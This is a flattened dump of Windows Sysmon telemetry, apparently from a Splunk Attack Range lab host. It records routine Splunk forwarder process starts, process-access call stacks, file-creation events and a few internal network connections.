Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E331F90B710FB20AD70FDCFC9C944D1,SHA256=B106B163F10BB7659D242618DA87CDB23660D2F996115497FCEB65A3AC5B5F2C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497067Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:05.634{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50491-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497069Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:36.788{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51F9AB5D3007DA59A4C8C921F7D9ABBA,SHA256=50B2D9BA0381507ECCC71EBD9C039055749BA6F61E5AF74FB11F00AC1F7D6931,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497079Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A079-6140-7256-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497078Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497077Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497076Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497075Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497074Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A079-6140-7256-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497073Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.918{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A079-6140-7256-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497072Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.903{B81B27B7-A079-6140-7256-04000000C801}4180C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497071Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:37.794{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F23066A3A6E6E03249DECC6301BA2F8,SHA256=BA8AA419ECD4C3BA14A2C8D6A0724A2EB807356B61DF0821CF24F9A77ED57E6E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497070Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:06.756{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50492-false10.0.1.12-8000- 23542300x800000000000000036497092Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26F84F1BC30CFF57779AAEF8B11297CD,SHA256=6CD053D984782F311C8BC5CD90458C039C54F3B7A7FCEC2D7FFD398CD4C3EEBA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497091Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D231E2BA00F5AF11C71DF19DA212340,SHA256=D387AC47FCC660B1BCF602443A5134F47543159A7378F0D4E296352B3700A5FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497090Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.832{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2254AB61E3C321B7DFDB004ED75AB3D,SHA256=305EA6AC28D2514E882556B88E14F9BD5AC09E762D6748ED75EFDBB4F1BF6A81,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497089Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.770{B81B27B7-A07A-6140-7356-04000000C801}65845356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497088Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A07A-6140-7356-04000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497087Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497086Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497085Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497084Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497083Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A07A-6140-7356-04000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497082Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.617{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A07A-6140-7356-04000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497081Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.602{B81B27B7-A07A-6140-7356-04000000C801}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036497080Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:38.071{B81B27B7-A079-6140-7256-04000000C801}41805564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497101Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.874{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1354D9542F0ABF20CF530871D8C79B76,SHA256=3FD216DA47F404737FDA0A2DD733411735F83DB520403756A6F296A0FDA9E103,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.153{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A07B-6140-7456-04000000C801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.151{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.151{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.151{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.151{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497095Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.151{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A07B-6140-7456-04000000C801}1512C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497094Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:39.150{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A07B-6140-7456-04000000C801}1512C:\Program 